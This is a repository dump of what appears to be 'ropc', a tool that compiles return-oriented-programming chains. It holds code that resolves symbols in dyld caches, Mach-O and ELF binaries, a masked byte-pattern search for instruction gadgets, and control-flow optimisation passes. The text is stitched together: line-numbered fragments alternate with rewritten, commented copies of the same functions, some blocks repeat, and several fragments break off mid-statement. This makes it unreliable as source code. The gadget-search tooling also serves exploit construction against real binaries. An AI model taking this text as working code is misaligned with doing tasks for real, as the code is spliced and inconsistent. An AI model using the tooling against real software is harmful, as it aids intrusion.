337 | iextdefsym = sym->iextdefsym; 338 | nextdefsym = sym->nextdefsym; 339 | } 340 | q = q + cmd->cmdsize; 341 | } 342 | 343 | assert(symoff && stroff && iextdefsym >= 0 && nextdefsym >= 0); 344 | 345 | if (is64) { 346 | const struct nlist_64 *base = NULL; 347 | for (base = (struct nlist_64 *)(p + symoff) + iextdefsym; nextdefsym > 0; nextdefsym /= 2) { 348 | const struct nlist_64 *pivot = &base[nextdefsym / 2]; 349 | int cmp = strcmp(key, (char *)p + stroff + pivot->n_un.n_strx); 350 | if (cmp == 0) { 351 | long long thumb = (pivot->n_desc & N_ARM_THUMB_DEF) != 0; 352 | fprintf(stderr, "0x%llX: %s\n", pivot->n_value + thumb, key); /* log exactly the value returned below */ 353 | return pivot->n_value + thumb; 354 | } 355 | if (cmp > 0) { 356 | base = &pivot[1]; 357 | --nextdefsym; 358 | } 359 | } 360 | } 
else { 361 | const struct nlist *base = NULL; 362 | for (base = (struct nlist *)(p + symoff) + iextdefsym; nextdefsym > 0; nextdefsym /= 2) { 363 | const struct nlist *pivot = &base[nextdefsym / 2]; 364 | int cmp = strcmp(key, (char *)p + stroff + pivot->n_un.n_strx); 365 | if (cmp == 0) { 366 | int thumb = (pivot->n_desc & N_ARM_THUMB_DEF) != 0; 367 | fprintf(stderr, "0x%X: %s\n", thumb + pivot->n_value, key); 368 | return pivot->n_value + thumb; 369 | } 370 | if (cmp > 0) { 371 | base = &pivot[1]; 372 | --nextdefsym; 373 | } 374 | } 375 | } 376 | 377 | return 0; 378 | } 379 | 380 | 381 | static uint64_t 382 | parse_cache_symbols(const unsigned char *p, const char *key) 383 | { 384 | unsigned i; 385 | const struct dyld_cache_header *hdr = (struct dyld_cache_header *)p; 386 | const struct dyld_cache_mapping_info *map = (struct dyld_cache_mapping_info *)(p + hdr->mappingOffset); 387 | const struct dyld_cache_image_info *img = (struct dyld_cache_image_info *)(p + hdr->imagesOffset); 388 | printf("magic: \"%.16s\"\n", hdr->magic); 389 | printf("mappingOffset: 0x%X\n", hdr->mappingOffset); 390 | printf("mappingCount: %d\n", hdr->mappingCount); 391 | printf("imagesOffset: 0x%X\n", hdr->imagesOffset); 392 | printf("imagesCount: %d\n", hdr->imagesCount); 393 | printf("dyldBaseAddress: 0x%llX\n", hdr->dyldBaseAddress); 394 | printf("codeSignatureOffset: 0x%llX\n", hdr->codeSignatureOffset); 395 | printf("codeSignatureSize: %lld\n", hdr->codeSignatureSize); 396 | for (i = 0; i < hdr->mappingCount; i++) { 397 | printf("MAPPING#%d\n", i); 398 | printf("\taddress = 0x%llX\n", map[i].address); 399 | printf("\tsize = %lld\n", map[i].size); 400 | printf("\tfileOffset = 0x%llX\n", map[i].fileOffset); 401 | printf("\tprotection = 0x%X / 0x%X\n", map[i].maxProt, map[i].initProt); 402 | } 403 | for (i = 0; i < hdr->imagesCount; i++) { 404 | uint64_t address = img[i].address; 405 | int j = find_mapping(hdr->mappingCount, map, address); 406 | 407 | printf("IMAGE#%d\n", i); 408 | 
/*
 * Search the symbol tables of a 32-bit ELF image for `name`.
 *
 * Every SHT_SYMTAB / SHT_DYNSYM section is scanned linearly; names are read
 * from the string table section referenced by sh_link.  Symbols with a zero
 * value, undefined or absolute symbols, and section/file symbols are
 * ignored.  A hit is logged to stderr.
 *
 * Returns the symbol value, or 0 when nothing matches.
 */
static uint64_t
parse_elf32_symbols(const unsigned char *p, const char *name)
{
    unsigned i;
    const Elf32_Ehdr *hdr = (const Elf32_Ehdr *)p;
    const Elf32_Shdr *sections = (const Elf32_Shdr *)(p + hdr->e_shoff);

    for (i = 0; i < hdr->e_shnum; i++) {
        const Elf32_Shdr *shdr = &sections[i];
        const Elf32_Sym *sym;
        const char *strtab;
        unsigned n;

        if (shdr->sh_type != SHT_SYMTAB && shdr->sh_type != SHT_DYNSYM) {
            continue;
        }
        if (shdr->sh_entsize == 0) {
            /* malformed table: skip it rather than divide by zero */
            continue;
        }

        sym = (const Elf32_Sym *)(p + shdr->sh_offset);
        strtab = (const char *)(p + sections[shdr->sh_link].sh_offset);
        for (n = shdr->sh_size / shdr->sh_entsize; n > 0; n--, sym++) {
            if (sym->st_value && sym->st_shndx != SHN_UNDEF && sym->st_shndx != SHN_ABS &&
                ELF32_ST_TYPE(sym->st_info) != STT_SECTION && ELF32_ST_TYPE(sym->st_info) != STT_FILE &&
                !strcmp(name, strtab + sym->st_name)) {
                fprintf(stderr, "0x%X: %s\n", (unsigned)sym->st_value, name);
                return sym->st_value;
            }
        }
    }

    return 0;
}

/*
 * 64-bit counterpart of parse_elf32_symbols(): same filtering and the same
 * return convention, operating on Elf64_* structures.
 *
 * NOTE(review): the type test uses the ELF32_ST_TYPE accessor on a 64-bit
 * symbol, as the original code did; presumably both accessors extract the
 * same bits of st_info -- confirm against elf.h.
 */
static uint64_t
parse_elf64_symbols(const unsigned char *p, const char *name)
{
    unsigned i;
    const Elf64_Ehdr *hdr = (const Elf64_Ehdr *)p;
    const Elf64_Shdr *sections = (const Elf64_Shdr *)(p + hdr->e_shoff);

    for (i = 0; i < hdr->e_shnum; i++) {
        const Elf64_Shdr *shdr = &sections[i];
        const Elf64_Sym *sym;
        const char *strtab;
        unsigned n;

        if (shdr->sh_type != SHT_SYMTAB && shdr->sh_type != SHT_DYNSYM) {
            continue;
        }
        if (shdr->sh_entsize == 0) {
            /* malformed table: skip it rather than divide by zero */
            continue;
        }

        sym = (const Elf64_Sym *)(p + shdr->sh_offset);
        strtab = (const char *)(p + sections[shdr->sh_link].sh_offset);
        for (n = shdr->sh_size / shdr->sh_entsize; n > 0; n--, sym++) {
            if (sym->st_value && sym->st_shndx != SHN_UNDEF && sym->st_shndx != SHN_ABS &&
                ELF32_ST_TYPE(sym->st_info) != STT_SECTION && ELF32_ST_TYPE(sym->st_info) != STT_FILE &&
                !strcmp(name, strtab + sym->st_name)) {
                fprintf(stderr, "0x%llX: %s\n", (unsigned long long)sym->st_value, name);
                return sym->st_value;
            }
        }
    }

    return 0;
}
/*
 * Resolve `key` in a mapped binary, dispatching on the file signature:
 *
 *   "dyld_v1 "            dyld shared cache
 *   0xfeedface/0xfeedfacf Mach-O image at offset 0
 *   "\177ELF" class 1/2   32-/64-bit ELF
 *
 * ELF lookups skip the first character of `key`.
 * NOTE(review): presumably this drops a Mach-O style leading underscore so
 * one key works for both formats -- confirm with the callers.
 *
 * Returns the symbol address, or 0 when the format is unknown or the
 * symbol is not found.
 */
uint64_t
parse_symbols(const unsigned char *p, const char *key)
{
    uint32_t magic;
    const char *elf_key;

    if (!strncmp((const char *)p, "dyld_v1 ", 8)) {
        return parse_cache_symbols(p, key);
    }

    /* copy the magic out instead of dereferencing a cast pointer:
     * p carries no alignment guarantee */
    memcpy(&magic, p, sizeof magic);
    if ((magic & ~1u) == 0xfeedface) {
        return parse_macho_symbols(p, 0, key);
    }

    /* never step past the terminator of an empty key */
    elf_key = key[0] ? key + 1 : key;
    if (!memcmp(p, "\177ELF\001", 5)) {
        return parse_elf32_symbols(p, elf_key);
    }
    if (!memcmp(p, "\177ELF\002", 5)) {
        return parse_elf64_symbols(p, elf_key);
    }
    return 0;
}
/* <limits.h> normally provides this; only define it when it is missing so
 * the standard macro is never redefined. */
#ifndef UCHAR_MAX
#define UCHAR_MAX 255
#endif

/*
 * Boyer-Moore-Horspool substring search over raw bytes.
 *
 * Returns a pointer to the first occurrence of needle[0..nlen) inside
 * haystack[0..hlen), or NULL when there is none, when nlen is 0, or when
 * either pointer is NULL.
 */
static unsigned char *
boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,
                           const unsigned char* needle,   size_t nlen)
{
    size_t last, scan = 0;
    size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called:
                                          * bad character shift */

    /* Sanity checks on the parameters */
    if (nlen == 0 || !haystack || !needle)
        return NULL;

    /* ---- Preprocess ---- */
    /* A byte that does not occur in the needle lets us skip ahead by the
     * whole length of the needle. */
    for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1)
        bad_char_skip[scan] = nlen;

    /* [nlen - 1] is the last byte of the needle. */
    last = nlen - 1;

    /* Bytes that do occur (except the last one) allow a shorter skip. */
    for (scan = 0; scan < last; scan = scan + 1)
        bad_char_skip[needle[scan]] = last - scan;

    /* ---- Do the matching ---- */

    /* Search the haystack, while the needle can still be within it. */
    while (hlen >= nlen)
    {
        /* scan from the end of the needle */
        for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1)
            if (scan == 0) /* If the first byte matches, we've found it. */
                return (unsigned char *)haystack;

        /* Otherwise skip ahead.  The skip is always looked up for the
         * haystack byte aligned with the LAST needle byte, wherever the
         * mismatch happened; that is what makes this the Horspool variant.
         * The skip never exceeds nlen <= hlen, so hlen cannot wrap. */
        hlen     -= bad_char_skip[haystack[last]];
        haystack += bad_char_skip[haystack[last]];
    }

    return NULL;
}
/*
 * Convert a textual byte pattern into bytes plus a per-byte mask.
 *
 * Each byte is written as two characters: a hex digit (either case) or '.'
 * for a wildcard nibble.  A hex digit contributes 0xF to its half of the
 * mask, a '.' contributes 0 (and a zero nibble to the byte).  Spaces are
 * skipped between bytes only.  Parsing stops at the first other character
 * (including the terminator) or once buflen bytes were produced.
 *
 * Returns the number of bytes stored in buf/mask.
 */
static size_t
str2hex(size_t buflen, unsigned char *buf, unsigned char *mask, const char *str)
{
    unsigned char *const start = buf;
    int high = -1;      /* pending high nibble, -1 while none is pending */
    int bits = 0;       /* mask accumulated for the byte being assembled */

    while (buflen > 0) {
        int ch = *str++;
        int value;

        if (ch == ' ' && high < 0) {
            continue;
        }

        if (ch == '.') {
            value = 0;
        } else if (ch >= '0' && ch <= '9') {
            value = ch - '0';
            bits |= 0xF;
        } else {
            ch |= 0x20;                     /* fold upper case onto lower case */
            if (ch < 'a' || ch > 'f') {
                break;
            }
            value = ch - ('a' - 10);
            bits |= 0xF;
        }

        if (high < 0) {
            /* first half of a byte: remember it and make room in the mask */
            high = value;
            bits <<= 4;
            continue;
        }

        *buf++ = (high << 4) | value;
        *mask++ = bits;
        buflen--;
        high = -1;
        bits = 0;
    }
    return buf - start;
}

/*
 * Find the longest run of fully significant bytes (mask == 0xFF) within
 * mask[0..n).  The first such run wins on ties.
 *
 * Stores the run length in *len and returns the index where it starts
 * (0 with *len == 0 when there is no such byte).
 */
static size_t
find_sequence(const unsigned char *mask, size_t n, size_t *len)
{
    size_t run = 0;         /* length of the run ending just before idx */
    size_t best = 0;
    size_t best_end = 0;    /* one past the last byte of the best run */
    size_t idx = 0;

    while (idx < n) {
        if (mask[idx] == 0xFF) {
            run++;
        } else {
            if (run > best) {
                best = run;
                best_end = idx;
            }
            run = 0;
        }
        idx++;
    }
    if (run > best) {
        best = run;
        best_end = idx;
    }

    *len = best;
    return best_end - best;
}

/*
 * Compile a textual pattern (see str2hex) for searching.
 *
 * On success returns a malloc'ed byte array and fills in:
 *   *len       number of pattern bytes
 *   *out_mask  malloc'ed mask of the same length
 *   *seq_pos / *seq_len  the longest wildcard-free run (see find_sequence)
 * The caller frees both arrays.
 *
 * Returns NULL, leaving the outputs untouched, when the string is shorter
 * than two characters, yields no bytes, or memory runs out.
 */
static unsigned char *
process_pattern(const char *str, size_t *len, unsigned char **out_mask, size_t *seq_pos, size_t *seq_len)
{
    size_t capacity = strlen(str) / 2;  /* upper bound: two characters per byte */
    unsigned char *bytes = NULL;
    unsigned char *bits = NULL;
    size_t used;

    if (capacity == 0) {
        return NULL;
    }

    bytes = malloc(capacity);
    if (bytes) {
        bits = malloc(capacity);
    }
    if (!bytes || !bits) {
        goto fail;
    }

    used = str2hex(capacity, bytes, bits, str);
    if (used == 0) {
        goto fail;
    }

    *len = used;
    *out_mask = bits;
    *seq_pos = find_sequence(bits, used, seq_len);
    return bytes;

fail:
    free(bits);
    free(bytes);
    return NULL;
}
644 | free(mask); 645 | free(pattern); 646 | return NULL; 647 | } 648 | 649 | *len = n; 650 | *out_mask = mask; 651 | *seq_pos = find_sequence(mask, n, seq_len); 652 | return pattern; 653 | } 654 | 655 | static const unsigned char * 656 | find_string(const unsigned char* haystack, size_t hlen, 657 | const unsigned char* needle, size_t nlen, 658 | const unsigned char* mask, size_t seq_pos, size_t seq_len) 659 | { 660 | while (hlen >= nlen) { 661 | size_t i; 662 | const unsigned char *ptr = haystack; 663 | if (seq_len) { 664 | ptr = boyermoore_horspool_memmem(haystack + seq_pos, hlen - nlen + seq_len, needle + seq_pos, seq_len); 665 | if (!ptr) { 666 | break; 667 | } 668 | ptr -= seq_pos; 669 | } 670 | for (i = 0; i < seq_pos; i++) { 671 | if ((ptr[i] & mask[i]) != needle[i]) { 672 | break; 673 | } 674 | } 675 | if (i < seq_pos) { 676 | hlen -= ptr - haystack + 1; 677 | haystack = ptr + 1; 678 | continue; 679 | } 680 | for (i += seq_len; i < nlen; i++) { 681 | if ((ptr[i] & mask[i]) != needle[i]) { 682 | break; 683 | } 684 | } 685 | if (i < nlen) { 686 | hlen -= ptr - haystack + 1; 687 | haystack = ptr + 1; 688 | continue; 689 | } 690 | return ptr; 691 | } 692 | return NULL; 693 | } 694 | 695 | uint64_t 696 | parse_string(const struct range *ranges, const unsigned char *p, void *user, callback_t callback, const char *str) 697 | { 698 | const struct range *r; 699 | uint64_t found = 0; 700 | int align = 0; 701 | 702 | size_t len, seq_len, seq_pos; 703 | unsigned char *pattern, *mask; 704 | 705 | switch (*str) { 706 | case '+': 707 | str++; 708 | align = 3; 709 | break; 710 | case '-': 711 | str++; 712 | align = 1; 713 | break; 714 | } 715 | 716 | pattern = process_pattern(str, &len, &mask, &seq_pos, &seq_len); 717 | if (!pattern) { 718 | return 0; 719 | } 720 | 721 | for (r = ranges; r; r = r->next) { 722 | const unsigned char *buf = p + r->offset; 723 | const unsigned char *ptr = buf - 1; 724 | while (1) { 725 | unsigned long long addr; 726 | size_t left = r->filesize 
#ifdef HAVE_MAIN
/*
 * Stand-alone driver: maps the file named by argv[1] (default "cache"),
 * runs a sample pattern search over its ranges and then looks up every
 * remaining argument as a symbol.
 *
 * Returns 0 on success, 1 when the file cannot be opened, sized or mapped.
 * Failures are reported explicitly rather than through assert(), so they
 * are still detected when assertions are compiled out.
 */
int
main(int argc, char **argv)
{
    int fd;
    long sz;
    unsigned char *p;
    struct range *ranges;
    const char *filename = "cache";

    if (argc > 1) {
        filename = *++argv;
        argc--;
    }

    fd = open(filename, O_RDONLY);
    if (fd < 0) {
        perror(filename);
        return 1;
    }
    sz = lseek(fd, 0, SEEK_END);
    if (sz <= 0) {
        /* lseek failed or the file is empty: nothing sensible to map */
        fprintf(stderr, "%s: cannot determine size or file is empty\n", filename);
        close(fd);
        return 1;
    }
    p = mmap(NULL, sz, PROT_READ, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) {
        perror("mmap");
        close(fd);
        return 1;
    }
    close(fd);      /* the mapping stays valid after the descriptor is closed */

    ranges = parse_ranges(p, sz);

    parse_string(ranges, p, NULL, NULL, "+ 0a f0 14 e8");

    delete_ranges(ranges);

    while (argc-- > 1) {
        parse_symbols(p, *++argv);
    }

    munmap(p, sz);
    return 0;
}
#endif
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "config.h" 5 | #include "util.h" 6 | #include "lexer.h" 7 | #include "parser.h" 8 | #include "symtab.h" 9 | #include "cycle.h" 10 | #include "emit.h" 11 | #include "code.h" 12 | #include "backend.h" 13 | 14 | 15 | struct label_node { 16 | struct label_node *next; 17 | char *label; 18 | int used; 19 | }; 20 | 21 | 22 | #ifdef CODE_DEBUG 23 | #include 24 | 25 | 26 | static void 27 | print_ops(struct the_node *list) 28 | { 29 | struct the_node *n; 30 | for (n = list; n; n = n->next) { 31 | struct label_node *l; 32 | for (l = n->labels; l; l = l->next) { 33 | printf("%s: [%d]\n", l->label, l->used); 34 | } 35 | printf("%c ", n->reachable ? 'x' : ' '); 36 | if (n->cond != COND_AL) { 37 | printf("if %scond goto %s", (n->cond == COND_EQ) ? "!" : "", n->jump); 38 | } else if (n->jump) { 39 | printf("goto %s", n->jump); 40 | } else if (n->code) { 41 | printf("code"); 42 | } else { 43 | printf(""); 44 | } 45 | printf("\n"); 46 | } 47 | } 48 | #endif 49 | 50 | 51 | struct label_node * 52 | new_label(struct label_node *top, const char *label) 53 | { 54 | struct label_node *n = xmalloc(sizeof(struct label_node)); 55 | n->label = xstrdup(label); 56 | n->next = top; 57 | n->used = 0; 58 | return n; 59 | } 60 | 61 | 62 | struct the_node * 63 | create_the_node(void) 64 | { 65 | struct the_node *n = xmalloc(sizeof(struct the_node)); 66 | n->next = NULL; 67 | 68 | n->labels = NULL; 69 | n->code = NULL; 70 | n->jump = NULL; 71 | n->cond = COND_AL; 72 | n->attr = 0; 73 | 74 | n->lineno = token.lineno; 75 | n->filename = strdup(token.filename); 76 | n->reachable = FALSE; 77 | 78 | n->edge[0] = n->edge[1] = NULL; 79 | n->index = UNDEFINED; 80 | n->onstack = FALSE; 81 | n->scc = FALSE; 82 | return n; 83 | } 84 | 85 | 86 | static void 87 | delete_the_node(struct the_node *n) 88 | { 89 | struct label_node *l; 90 | for (l = n->labels; l; ) { 91 | struct 
label_node *q = l->next; 92 | free(l->label); 93 | free(l); 94 | l = q; 95 | } 96 | free_nodes(n->code); 97 | free(n->jump); 98 | free(n->filename); 99 | free(n); 100 | } 101 | 102 | 103 | static void 104 | move_labels(struct the_node *from, struct the_node *to) 105 | { 106 | if (from->labels) { 107 | struct label_node *l = from->labels; 108 | while (l->next) { 109 | l = l->next; 110 | } 111 | l->next = to->labels; 112 | to->labels = from->labels; 113 | from->labels = NULL; 114 | } 115 | } 116 | 117 | 118 | static void 119 | merge_labels(struct the_node *list) 120 | { 121 | struct the_node *n; 122 | for (n = list; n; n = n->next) { 123 | if (n->code == NULL && n->jump == NULL && n->next) { 124 | move_labels(n, n->next); 125 | } 126 | } 127 | } 128 | 129 | 130 | static void 131 | ref_label(struct the_node *n, const char *label) 132 | { 133 | if (n) { 134 | struct label_node *l; 135 | for (l = n->labels; l; l = l->next) { 136 | if (!strcmp(label, l->label)) { 137 | l->used++; 138 | break; 139 | } 140 | } 141 | } 142 | } 143 | 144 | 145 | static void 146 | unref_label(struct the_node *n, const char *label) 147 | { 148 | if (n) { 149 | struct label_node *l, *lp = NULL; 150 | for (l = n->labels; l; lp = l, l = l->next) { 151 | if (!strcmp(label, l->label)) { 152 | l->used--; 153 | if (!l->used) { 154 | if (lp) { 155 | lp->next = l->next; 156 | } else { 157 | n->labels = l->next; 158 | } 159 | free(l->label); 160 | free(l); 161 | } 162 | break; 163 | } 164 | } 165 | } 166 | } 167 | 168 | 169 | static void 170 | update_edges(struct the_node *head, struct the_node *from, struct the_node *to) 171 | { 172 | /* XXX wow, this is god damn slow */ 173 | while (head) { 174 | if (head->edge[0] == from) { 175 | head->edge[0] = to; 176 | } 177 | if (head->edge[1] == from) { 178 | head->edge[1] = to; 179 | } 180 | head = head->next; 181 | } 182 | } 183 | 184 | 185 | static void 186 | mark_reachables(struct the_node *list) 187 | { 188 | struct the_node *n = list; 189 | while (n && 
!n->reachable) { 190 | n->reachable = TRUE; 191 | mark_reachables(n->edge[1]); 192 | n = n->edge[0]; 193 | } 194 | } 195 | 196 | 197 | static void 198 | unmark_reachables(struct the_node *list) 199 | { 200 | struct the_node *n = list; 201 | for (n = list; n; n = n->next) { 202 | n->reachable = FALSE; 203 | } 204 | } 205 | 206 | 207 | static struct the_node * 208 | prune_nodes(struct the_node *list) 209 | { 210 | int pass; 211 | BOOL dirty = TRUE; 212 | int save_lineno = token.lineno; 213 | char *save_filename = token.filename; 214 | struct the_node *n, *next, *prev; 215 | for (pass = 0; pass < 10 && dirty; pass++) { 216 | dirty = FALSE; 217 | mark_reachables(list); 218 | #ifdef CODE_DEBUG 219 | printf("--- pass %d init ---------------\n", pass); 220 | print_ops(list); 221 | #endif 222 | // prune empty and dead nodes 223 | for (prev = NULL, n = list; n; n = next) { 224 | next = n->next; 225 | assert(n->jump || n->cond == COND_AL); 226 | if (n->jump || n->code || n->labels) { 227 | if (n->reachable) { 228 | prev = n; 229 | continue; 230 | } 231 | if (pass == 0 && n->lineno > 0) { 232 | token.lineno = n->lineno; 233 | token.filename = n->filename; 234 | cry("unreachable code\n"); 235 | } 236 | } 237 | dirty = TRUE; 238 | if (prev) { 239 | prev->next = next; 240 | } else { 241 | list = next; 242 | } 243 | if (n->jump) { 244 | unref_label(n->edge[n->cond != COND_AL], n->jump); 245 | } 246 | update_edges(list, n, n->edge[0]); 247 | delete_the_node(n); 248 | } 249 | // follow goto chains 250 | for (n = list; n; n = n->next) { 251 | if (n->jump) { 252 | struct the_node *other = n->edge[n->cond != COND_AL]; 253 | unmark_reachables(list); 254 | n->reachable = TRUE; 255 | next = NULL; 256 | while (other && !other->reachable && other->jump && other->cond == COND_AL) { 257 | next = other; 258 | other->reachable = TRUE; 259 | other = other->edge[0]; 260 | } 261 | if (next) { 262 | dirty = TRUE; 263 | unref_label(n->edge[n->cond != COND_AL], n->jump); 264 | free(n->jump); 265 | 
n->jump = xstrdup(next->jump); 266 | n->edge[n->cond != COND_AL] = next->edge[0]; 267 | ref_label(next->edge[0], n->jump); 268 | } 269 | } 270 | } 271 | // convert "if (COND) goto one; goto two; one:" => "if !(COND) goto two;" 272 | for (n = list; n; n = n->next) { 273 | next = n->next; 274 | if (!n->jump || n->cond == COND_AL || !next || !next->jump || next->cond != COND_AL || next->labels || !next->next || n->edge[1] != next->next) { 275 | continue; 276 | } 277 | assert(n->code && !next->code); 278 | dirty = TRUE; 279 | unref_label(next->next, n->jump); 280 | free(n->jump); 281 | n->jump = next->jump; 282 | n->edge[0] = next->next; 283 | n->edge[1] = next->edge[0]; 284 | n->next = next->next; 285 | n->cond = COND_FLIP(n->cond); 286 | next->jump = NULL; 287 | delete_the_node(next); 288 | } 289 | // convert "[if (COND)] goto one; one:" => "[COND;] one:" 290 | for (prev = NULL, n = list; n; n = next) { 291 | next = n->next; 292 | if (!n->jump || !next || n->edge[n->cond != COND_AL] != next) { 293 | prev = n; 294 | continue; 295 | } 296 | dirty = TRUE; 297 | unref_label(next, n->jump); 298 | free(n->jump); 299 | n->jump = NULL; 300 | if (n->code) { 301 | n->cond = COND_AL; 302 | n->edge[0] = next; 303 | n->edge[1] = NULL; 304 | continue; 305 | } 306 | if (prev) { 307 | prev->next = next; 308 | } else { 309 | list = next; 310 | } 311 | move_labels(n, next); 312 | update_edges(list, n, next); 313 | delete_the_node(n); 314 | } 315 | // convert "if (COND) goto one; goto one" => "COND; goto one;" 316 | for (n = list; n; n = n->next) { 317 | next = n->next; 318 | if (!n->jump || n->cond == COND_AL || !next || !next->jump || next->cond != COND_AL || strcmp(n->jump, next->jump)) { 319 | continue; 320 | } 321 | assert(n->edge[1] == next->edge[0]); 322 | dirty = TRUE; 323 | unref_label(n->edge[1], n->jump); 324 | free(n->jump); 325 | n->jump = NULL; 326 | n->cond = COND_AL; 327 | } 328 | unmark_reachables(list); 329 | #ifdef CODE_DEBUG 330 | printf("--- pass %d done 
---------------\n", pass); 331 | print_ops(list); 332 | #endif 333 | } 334 | #ifdef CODE_DEBUG 335 | printf("-------------------------------\n"); 336 | #endif 337 | token.lineno = save_lineno; 338 | token.filename = save_filename; 339 | return list; 340 | } 341 | 342 | 343 | static struct the_node * 344 | find_node_with_label(struct the_node *head, const char *label) 345 | { 346 | /* XXX wow, this is god damn slow */ 347 | while (head) { 348 | struct label_node *l; 349 | for (l = head->labels; l; l = l->next) { 350 | if (!strcmp(l->label, label)) { 351 | l->used++; 352 | return head; 353 | } 354 | } 355 | head = head->next; 356 | } 357 | return NULL; 358 | } 359 | 360 | 361 | static void 362 | link_graph(struct the_node *list) 363 | { 364 | /* XXX check labels using symtab */ 365 | struct the_node *n; 366 | for (n = list; n; n = n->next) { 367 | if (n->attr & ATTRIB_NORETURN) { 368 | continue; 369 | } 370 | n->edge[0] = n->next; 371 | if (n->cond != COND_AL) { 372 | n->edge[1] = find_node_with_label(list, n->jump); 373 | } else if (n->jump) { 374 | n->edge[0] = find_node_with_label(list, n->jump); 375 | } 376 | } 377 | } 378 | 379 | 380 | void 381 | emit_code(struct the_node *list) 382 | { 383 | struct the_node *n = list; 384 | if (optimize_jmp) { 385 | merge_labels(n); 386 | } 387 | link_graph(n); 388 | if (optimize_jmp) { 389 | n = prune_nodes(n); 390 | } 391 | mark_cycles(n); 392 | emit_initialize(); 393 | while (n) { 394 | struct label_node *l; 395 | struct the_node *p = n->next; 396 | token.lineno = n->lineno; 397 | free(token.filename); 398 | token.filename = n->filename; 399 | for (l = n->labels; l; ) { 400 | struct label_node *q = l->next; 401 | emit_label(l->label, l->used, l->next == NULL); 402 | free(l->label); 403 | free(l); 404 | l = q; 405 | } 406 | if (n->cond != COND_AL) { 407 | n->code = reverse_list(n->code); 408 | emit_nodes(n->code, NULL, TRUE, n->scc); 409 | emit_cond(n->jump, n->cond); 410 | free_nodes(n->code); 411 | free(n->jump); 412 | } 
#ifndef CODE_H_
#define CODE_H_

/* Marker for a node index that has not been assigned yet (any negative value). */
#define UNDEFINED -1
#define IS_UNDEFINED(x) ((x) < 0)

/* Jump condition of a node.  NE and EQ are each other's negation in value,
 * which is what COND_FLIP relies on. */
enum cond_t {
    COND_AL,		/* always */
    COND_NE = 1,	/* Z==0 */
    COND_EQ = -1	/* Z==1 */
};

/* Invert a condition: NE <-> EQ, AL stays AL. */
#define COND_FLIP(c) -(c)

/* One node of the program: an optional list of labels followed by either
 * code, an unconditional goto, or code plus a conditional jump. */
struct the_node {
    struct the_node *next;	/* next node in source order */

    /* filled in by parser */
    struct label_node *labels;	/* list of labels */
    struct node *code;		/* code to emit */
    char *jump;			/* goto target */
    enum cond_t cond;		/* evaluate code and jump */
    int attr;			/* maybe ATTRIB_NORETURN */
    int lineno;			/* line number, for error reporting */
    char *filename;		/* file name, for error reporting */
    int reachable;		/* scratch flag used by the reachability walks */

    struct the_node *edge[2];	/* edge[0] next in execution flow (may be NULL if this node is a noreturn). edge[1] next in conditional flow (usually NULL if this node is not conditional) */

    int index, lowlink, onstack;	/* tarjan */
    BOOL scc;			/* result of the cycle pass (see mark_cycles) */
};

/* Prepend a copy of `label` to the list `top`; returns the new head. */
struct label_node *new_label(struct label_node *top, const char *label);
/* Allocate an empty node stamped with the current token position. */
struct the_node *create_the_node(void);

/* Emit the program described by `list` and free the list. */
void emit_code(struct the_node *list);

#endif
edge[1] next in conditional flow (usually NULL if this node is not conditional) */ 29 | 30 | int index, lowlink, onstack; /* tarjan */ 31 | BOOL scc; 32 | }; 33 | 34 | struct label_node *new_label(struct label_node *top, const char *label); 35 | struct the_node *create_the_node(void); 36 | 37 | void emit_code(struct the_node *list); 38 | 39 | #endif 40 | -------------------------------------------------------------------------------- /config.h: -------------------------------------------------------------------------------- 1 | #ifndef CONFIG_H_ 2 | #define CONFIG_H_ 3 | 4 | #define ROPC_VERSION "1.2" 5 | #undef LEXER_DEBUG 6 | #undef PARSER_DEBUG 7 | #undef CODE_DEBUG 8 | #undef DATA_DEBUG 9 | #define LEXER_READ_CPP 10 | #define LEXER_STR_MERGE 11 | #define LEXER_APOS_INT 12 | #undef SLOW_LOAD_SAVE 13 | #define MAX_FUNC_ARGS 16 14 | 15 | extern int optimize_imm; 16 | extern int optimize_add; 17 | extern int optimize_reg; 18 | extern int optimize_jmp; 19 | extern int show_reg_set; 20 | extern int nasm_esc_str; 21 | extern int enable_cfstr; 22 | extern int no_undefined; 23 | extern int all_volatile; 24 | extern int inloop_stack; 25 | extern int new_name_off; 26 | 27 | extern const unsigned char *binmap; 28 | extern size_t binsz; 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /cycle.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "util.h" 4 | #include "code.h" 5 | #include "cycle.h" 6 | 7 | 8 | static int index; 9 | static int S_top; 10 | static struct the_node *S[1024]; 11 | 12 | 13 | #define S_PUSH(x) do { assert(S_top < 1024); S[S_top++] = x; (x)->onstack = TRUE; } while (0) 14 | #define S_POP(x) do { assert(S_top); x = S[--S_top]; (x)->onstack = FALSE; } while (0) 15 | #define S_PEEK() S[S_top - 1] 16 | 17 | 18 | static void 19 | strongconnect(struct the_node *v) 20 | { 21 | int i; 22 | v->index = index; 23 | v->lowlink = index; 24 | 
index++; 25 | S_PUSH(v); 26 | for (i = 0; i < 2; i++) { 27 | struct the_node *w = v->edge[i]; 28 | if (w) { 29 | if (IS_UNDEFINED(w->index)) { 30 | strongconnect(w); 31 | #if 1 32 | if (v->lowlink > w->lowlink) { 33 | v->lowlink = w->lowlink; 34 | } 35 | #else 36 | v->lowlink = min(v->lowlink, w->lowlink); 37 | #endif 38 | } else if (w->onstack) { 39 | #if 1 40 | if (v->lowlink > w->index) { 41 | v->lowlink = w->index; 42 | } 43 | #else 44 | v->lowlink = min(v->lowlink, w->index); 45 | #endif 46 | } 47 | } 48 | } 49 | if (v->lowlink == v->index) { 50 | struct the_node *w; 51 | int self = (S_PEEK() == v && v->edge[0] != v && v->edge[1] != v); 52 | do { 53 | S_POP(w); 54 | w->scc = !self; 55 | } while (w != v); 56 | } 57 | } 58 | 59 | 60 | void 61 | mark_cycles(struct the_node *list) 62 | { 63 | struct the_node *v; 64 | index = 0; 65 | S_top = 0; 66 | for (v = list; v; v = v->next) { 67 | if (IS_UNDEFINED(v->index)) { 68 | strongconnect(v); 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /cycle.h: -------------------------------------------------------------------------------- 1 | #ifndef CYCLE_H_ 2 | #define CYCLE_H_ 3 | 4 | void mark_cycles(struct the_node *list); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /depend: 